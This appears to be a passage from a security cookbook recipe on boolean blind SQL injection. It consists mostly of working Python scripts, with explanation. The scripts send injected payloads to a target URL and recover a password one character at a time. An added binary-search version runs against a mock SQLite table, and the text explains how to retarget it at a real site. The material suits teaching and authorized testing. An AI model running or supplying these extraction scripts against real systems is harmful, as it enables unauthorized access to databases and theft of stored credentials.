Exploiting Boolean SQLi

There are times when all you can get from a page is a yes or no. It's heartbreaking until you realize that that's the SQL equivalent of saying I LOVE YOU. Any SQLi can be broken down into a series of yes or no questions; the only cost is patience, since each question is one request.

We will create a script that takes a "yes" value (text that appears in the response only when the injected condition is true) and posts a predefined attack string to a target URL, recovering the result one character at a time. I have provided an example attack string, but this will change depending on the system you are testing.

How to do it…

The following script is how yours should look:

import requests
import sys

# Text that appears in the response only when the injected condition is true
yes = sys.argv[1]

i = 1            # candidate password length; the shortest possible answer is 1
asciivalue = 1   # candidate character code for the current position

answer = []
print("Kicking off the attempt")

# Step 1: find the length of the password by asking "is it i characters long?"
# for i = 1, 2, 3, ... The payload has to be rebuilt on every pass so that the
# new value of i is sent. This loop never ends if the yes string never appears,
# so confirm the yes string by hand before running the script.
while True:
    payload = {'injection': "' AND char_length(password) = " + str(i) + ";#",
               'Submit': 'submit'}
    req = requests.post('<target url>', data=payload)
    lengthtest = req.text
    if yes in lengthtest:
        length = i
        break
    else:
        i = i + 1

# Step 2: recover each position by asking "is character x equal to c?" for
# every candidate value of c. MySQL substr() positions are 1-based, so the
# range runs from 1 to length inclusive.
for x in range(1, length + 1):
    while asciivalue <= 126:
        # The candidate is quoted so that it compares as a string; a candidate
        # of ' or \ would break the query and needs escaping.
        payload = {'injection': "' AND (substr(password, " + str(x) + ", 1)) = '"
                                + chr(asciivalue) + "';#",
                   'Submit': 'submit'}
        req = requests.post('<target url>', data=payload)
        if yes in req.text:
            answer.append(chr(asciivalue))
            break
        else:
            asciivalue = asciivalue + 1
    asciivalue = 1   # start from the first candidate again for the next position
print("Recovered String: " + ''.join(answer))

How it works…

First, identify a string that appears in the response only when the injected condition is true (a welcome banner, a row of results, and so on). Alternatively, the script can be inverted to key on the absence of an error message. That string is passed in as sys.argv[1]. We also create the two counters the script uses and set both to 1: i is the first candidate password length, and the first position to test is 1, because MySQL's substr() and char_length() count from 1 rather than 0. We also create an empty list for our future answer and tell the user that the script is starting:

yes = sys.argv[1]

i = 1
asciivalue = 1
answer = []
print("Kicking off the attempt")

Our payload asks whether the length of the password we are trying to recover equals the current value of i. Because i changes on every pass, the payload is built inside the loop, and each version is submitted to the target URL in a POST request. The loop has no fixed bound, since we have no idea in advance how long the password is:

while True:
    payload = {'injection': "' AND char_length(password) = " + str(i) + ";#", 'Submit': 'submit'}
    req = requests.post('<target url>', data=payload)

Each time, we check whether the yes value we set originally is present in the response text and, if so, record the current value of i as the password length. The break statement is what ends the while loop:

    lengthtest = req.text
    if yes in lengthtest:
        length = i
        break

If we don't detect the yes value, we add 1 to i and go round again:

    else:
        i = i + 1

Using the identified length of the target string, we iterate over each position and, using asciivalue, over each candidate value for that character, submitting one request per candidate. Printable ASCII runs from 32 (space) to 126 (~), and 127 is the non-printable DEL, so the loop is capped at 126; if a position reaches the cap without a match, something has gone wrong, and the script as written simply moves on and leaves that position out of the answer. Two caveats: the candidate is wrapped in quotes so that it compares as a string, which means a candidate of ' or \ will break the query unless it is escaped; and MySQL's default collations are case-insensitive, so = 'a' also matches 'A'. Compare against BINARY substr(...) or test ord(substr(...)) if you need to recover case:

for x in range(1, length + 1):
    while asciivalue <= 126:
        payload = {'injection': "' AND (substr(password, " + str(x) + ", 1)) = '" + chr(asciivalue) + "';#", 'Submit': 'submit'}
        req = requests.post('<target url>', data=payload)

We check whether our yes string is present in the response and, if so, append the matching character (converted from its code with chr) to the answer list, then break to move on to the next position:

        if yes in req.text:
            answer.append(chr(asciivalue))
            break

If the yes value is not present, we increment asciivalue to try the next candidate for that position:

        else:
            asciivalue = asciivalue + 1

Finally, we reset asciivalue to 1 before moving on to the next position, and once the outer loop has covered every position up to the recovered length we print the whole string:

    asciivalue = 1
print("Recovered String: " + ''.join(answer))

There's more…

This script could be altered to iterate through tables and recover multiple values with better-crafted SQL injection strings. Ultimately, it provides a starting point, as does the later Blind SQL Injection script, for developing more complicated scripts to handle challenging tasks. See the Exploiting Blind SQL Injection recipe for a more advanced implementation of these concepts.
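The following is an added example and not code from the book: it runs the same boolean extraction offline against a constructed, deliberately injectable SQLite query, and replaces the one-request-per-candidate scan with a binary search over the character's code point, so each position costs 7 yes/no questions instead of up to 95. The users table, the admin row and the password are made up for the demonstration; length() and unicode() are SQLite's stand-ins for MySQL's char_length() and ord(); and the injected condition closes its own quote with AND 'x'='x' rather than a trailing ;# comment, which keeps the constructed query a single valid statement. The linear version of the same attack is included so the request counts can be compared.

```python
import sqlite3

# Constructed stand-in for the target: an in-memory SQLite database behind a
# query that concatenates the username straight into SQL (assumed, not real).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'Pa55w0rd!')")

QUERIES = {"count": 0}  # number of oracle questions asked, for comparing strategies


def vulnerable_login(username):
    """The page's 'yes' condition: True when the injectable query matches a row."""
    QUERIES["count"] += 1
    sql = "SELECT count(*) FROM users WHERE username = '" + username + "'"
    try:
        return conn.execute(sql).fetchone()[0] > 0
    except sqlite3.Error:
        return False


def oracle(condition):
    """Wrap a boolean SQL condition so the whole query stays syntactically valid."""
    return vulnerable_login("admin' AND (" + condition + ") AND 'x'='x")


def find_length(oracle, max_len=256):
    """Binary search for length(password) using only 'greater than' questions."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("length(password) > " + str(mid)):  # MySQL: char_length(password)
            lo = mid + 1
        else:
            hi = mid
    return lo


def find_char(oracle, pos):
    """Binary search the code point of one character: 7 questions for 0..127."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        # unicode() is SQLite's code point function; MySQL: ord(substr(password, pos, 1))
        if oracle("unicode(substr(password, " + str(pos) + ", 1)) > " + str(mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_password(oracle):
    """Length first, then every position, exactly as the recipe does, but with binary search."""
    length = find_length(oracle)
    return "".join(find_char(oracle, pos) for pos in range(1, length + 1))


def extract_password_linear(oracle):
    """The recipe's approach for comparison: one question per candidate character."""
    length = 1
    while not oracle("length(password) = " + str(length)):
        length += 1
    out = []
    for pos in range(1, length + 1):
        for code in range(32, 127):
            cand = chr(code).replace("'", "''")  # escape the quote so it cannot break the query
            if oracle("substr(password, " + str(pos) + ", 1) = '" + cand + "'"):
                out.append(chr(code))
                break
    return "".join(out)


if __name__ == "__main__":
    QUERIES["count"] = 0
    print("binary search:", extract_password(oracle), "in", QUERIES["count"], "queries")
    QUERIES["count"] = 0
    print("linear scan:  ", extract_password_linear(oracle), "in", QUERIES["count"], "queries")
```

Against a real target, replace vulnerable_login with a function that sends the POST request and returns whether the yes string is in the response; nothing else changes. The code-point comparison also sidesteps the case-insensitive collation problem, since ord() sees the byte value rather than the collated string.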
